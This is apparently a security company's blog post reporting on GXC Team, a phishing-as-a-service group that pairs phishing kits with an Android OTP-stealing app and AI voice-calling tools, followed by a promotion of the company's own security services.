A Spanish-speaking cybercrime group named GXC Team has been observed elevating the standard of phishing attacks by bundling phishing kits with malicious Android applications. This innovative approach has taken malware-as-a-service (MaaS) offerings to the next level. Singaporean cybersecurity firm Group-IB has been tracking this e-crime actor since January 2023, describing their solution as a “sophisticated AI-powered phishing-as-a-service platform” targeting users of more than 36 Spanish banks, various governmental bodies, and 30 institutions globally.
The phishing kit alone is priced between $150 and $900 per month. However, the bundle that includes both the phishing kit and Android malware is available for approximately $500 per month. This subscription model has widened their target base, including users from Spanish financial institutions, governmental services, e-commerce platforms, banks, and cryptocurrency exchanges in countries like the United States, United Kingdom, Slovakia, and Brazil. To date, 288 phishing domains linked to this campaign have been identified.
Combining Phishing Kits and Android Malware
What sets the GXC Team apart is their innovative method of combining phishing kits with SMS OTP stealer malware, deviating from traditional phishing attack scenarios. Instead of simply using bogus web pages to capture credentials, victims are persuaded to download a malicious Android banking app. This app, once installed, requests permissions to become the default SMS app, enabling it to intercept OTPs and other messages, which are then exfiltrated to a Telegram bot controlled by the attackers.
Security researchers Anton Ushakov and Martijn van den Berk highlighted this novel approach in their report, noting that the malicious app opens genuine bank websites in WebView, allowing users to interact normally. However, when an OTP is requested, the malware silently intercepts and forwards the SMS messages containing the OTP codes to the attackers’ Telegram chat. This mechanism enhances the credibility of the scam, making it more convincing for victims.
AI-Powered PaaS
Among the services advertised by the GXC Team on a dedicated Telegram channel are AI-powered voice calling tools. These tools enable their customers to generate voice calls based on a series of prompts from the phishing kit, making the scams even more convincing. These calls typically impersonate bank representatives, instructing targets to provide 2FA codes, install malicious apps, or perform other actions.
The use of AI in cybercrime is not new, but its integration into phishing-as-a-service platforms is a recent development. AI-powered voice cloning can mimic human speech with “uncanny precision,” facilitating authentic-sounding phishing (vishing) schemes that aid in initial access, privilege escalation, and lateral movement within networks. This technological advancement enables threat actors to impersonate executives, colleagues, or IT support personnel, manipulating victims into revealing confidential information or taking harmful actions.
AI-powered PaaS platforms utilize machine learning algorithms to generate realistic and personalized phishing emails, which can mimic legitimate communications from trusted sources. These emails are tailored based on data gathered from social media profiles, email addresses, and other publicly available information, increasing the likelihood of deceiving the recipient. By automating the creation and distribution of phishing content, AI-powered PaaS significantly lowers the barrier to entry for cybercriminals, enabling them to launch large-scale phishing campaigns with minimal effort.
The Mechanics of AI-Powered PaaS
AI-powered PaaS platforms incorporate several advanced technologies to enhance their phishing capabilities:
- Natural Language Processing (NLP): NLP algorithms analyze and generate human-like text, creating convincing phishing emails that are contextually relevant and grammatically correct. This makes it harder for recipients to distinguish phishing emails from legitimate communications.
- Machine Learning (ML): ML models analyze past phishing campaigns to identify patterns and strategies that are most successful. These insights are used to continuously refine and improve the effectiveness of new phishing attacks.
- Automation: AI-powered PaaS platforms automate the entire phishing process, from email generation and distribution to data collection and analysis. This allows cybercriminals to launch and manage multiple campaigns simultaneously, increasing their reach and impact.
- Deep Learning: Deep learning techniques are employed to create deepfake videos and audio, which can be used in spear-phishing attacks. These realistic forgeries can impersonate trusted individuals, making social engineering attacks more convincing and effective.
AI is also used to generate vast amounts of unique content for phishing websites, automating the creation process and making it harder for security measures to detect and block these sites. The automation of content generation using large language models (LLMs) allows threat actors to create phishing content more efficiently and at a scale that would be impossible for humans to achieve.
Advanced Phishing Techniques and AI Integration
The rise of AI in phishing campaigns has introduced more sophisticated attack vectors. AI-driven phishing kits can create personalized, highly convincing lures that are difficult for both individuals and automated systems to detect. These kits can leverage AI to analyze social media profiles and other publicly available information to craft tailored phishing emails, increasing the likelihood of successful attacks.
Furthermore, AI enhances the adaptability of phishing campaigns. Attackers can use AI to monitor the effectiveness of their phishing attempts in real time, adjusting their strategies to improve success rates. This dynamic approach makes traditional defense mechanisms less effective, as the phishing tactics continually evolve.
AI also facilitates the deployment of deepfake technology in phishing attacks. Deepfakes, which are hyper-realistic digital forgeries created using AI, can be used to impersonate trusted individuals in voice or video communications. This can lead to more convincing social engineering attacks, where victims are tricked into performing actions they would not ordinarily undertake, such as transferring funds or disclosing sensitive information.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
https://www.netizen.net/contact
